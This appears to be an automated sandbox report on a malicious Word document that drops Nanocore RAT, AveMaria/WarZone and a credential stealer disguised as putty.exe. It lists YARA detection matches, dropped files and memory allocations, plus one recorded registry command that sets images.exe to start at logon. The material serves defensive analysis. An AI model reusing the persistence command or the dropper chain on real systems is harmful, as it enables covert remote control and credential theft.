        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, ' I
        Source: Screenshot number: 12Screenshot OCR: Enable Editing when opening. ii: ^ f,if= a S
        .NET source code contains very large stringsShow sources
        Source: putty[1].exe.0.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: putty.exe.3.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: putty.exe.6.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: images.exe.13.dr, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 13.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 14.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Source: 14.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.csLong String: Length: 53649
        Found suspicious RTF objectsShow sources
        Source: abdtfhgXgdghgh.ScTStatic RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT
        Microsoft Office creates scripting filesShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScTJump to behavior
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to dropped file
        Powershell drops PE fileShow sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AF450
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5C98
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ACD28
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A8938
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A7178
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD150
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A6A38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A0A50
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A7A90
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5C89
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AC500
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A75A8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A95B1
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA9C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA5C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A95C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5A78
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA288
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5A88
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A5EF8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ABEC4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AAB30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ABF30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002ADF60
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AA7A0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002AD3C8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_005A0070
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_005A0006
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002A31F8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00400070
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0040002A
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053F450
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535C98
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D150
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00537178
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00538938
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053CD28
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00530A50
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00536A38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00537A90
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535C89
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053CD18
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053C500
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A9C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A5C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005395C0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005395B1
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005375A8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535A78
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535EF8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00535A88
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A288
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053DF60
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053AB30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053BF30
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D3C4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053D3C8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0053A7A0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005331F8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041DEAA
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041DEAA
        Source: C:\ProgramData\images.exeCode function: 17_2_0118B8B3
        Source: C:\ProgramData\images.exeCode function: 17_2_0118BDE0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035F450
        Source: C:\ProgramData\images.exeCode function: 17_2_00355C98
        Source: C:\ProgramData\images.exeCode function: 17_2_00358938
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CD28
        Source: C:\ProgramData\images.exeCode function: 17_2_00357178
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D150
        Source: C:\ProgramData\images.exeCode function: 17_2_00356A38
        Source: C:\ProgramData\images.exeCode function: 17_2_00357A90
        Source: C:\ProgramData\images.exeCode function: 17_2_00355C89
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D8FC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C4CC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035B530
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D920
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CD18
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C500
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D141
        Source: C:\ProgramData\images.exeCode function: 17_2_003595B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9C0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5C0
        Source: C:\ProgramData\images.exeCode function: 17_2_003595C0
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A78
        Source: C:\ProgramData\images.exeCode function: 17_2_0035F248
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CA8C
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A288
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A88
        Source: C:\ProgramData\images.exeCode function: 17_2_00355EF8
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BEC4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035AB30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BF30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF60
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF4F
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A7A0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A790
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C8
        Source: C:\ProgramData\images.exeCode function: 17_2_004A0070
        Source: C:\ProgramData\images.exeCode function: 17_2_0118A5BD
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A50
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A40
        Source: C:\ProgramData\images.exeCode function: 17_2_003531F8
        Source: C:\ProgramData\images.exeCode function: 17_2_003531E8
        Source: C:\ProgramData\images.exeCode function: 21_3_042442D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04281AA0
        Source: C:\ProgramData\images.exeCode function: 21_3_04276B50
        Source: C:\ProgramData\images.exeCode function: 21_3_042404D0
        Source: C:\ProgramData\images.exeCode function: 21_3_042A25EC
        Source: C:\ProgramData\images.exeCode function: 21_3_042645D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04234660
        Source: C:\ProgramData\images.exeCode function: 21_3_042456B0
        Source: C:\ProgramData\images.exeCode function: 21_3_04248720
        Source: C:\ProgramData\images.exeCode function: 21_3_04249730
        Source: C:\ProgramData\images.exeCode function: 21_3_04246010
        Source: C:\ProgramData\images.exeCode function: 21_3_0427E170
        Source: C:\ProgramData\images.exeCode function: 21_3_042511E0
        Source: C:\ProgramData\images.exeCode function: 21_3_0429E32F
        Source: C:\ProgramData\images.exeCode function: 21_3_04242350
        Source: C:\Windows\System32\drvinst.exeProcess token adjusted: Load Driver
        Source: C:\ProgramData\images.exeCode function: String function: 042358A0 appears 70 times
        Source: C:\ProgramData\images.exeCode function: String function: 042362B0 appears 93 times
        Source: C:\ProgramData\images.exeCode function: String function: 04235680 appears 38 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 004036F7 appears 144 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 0040357C appears 62 times
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00411E88 appears 98 times
        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpdr.sys
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
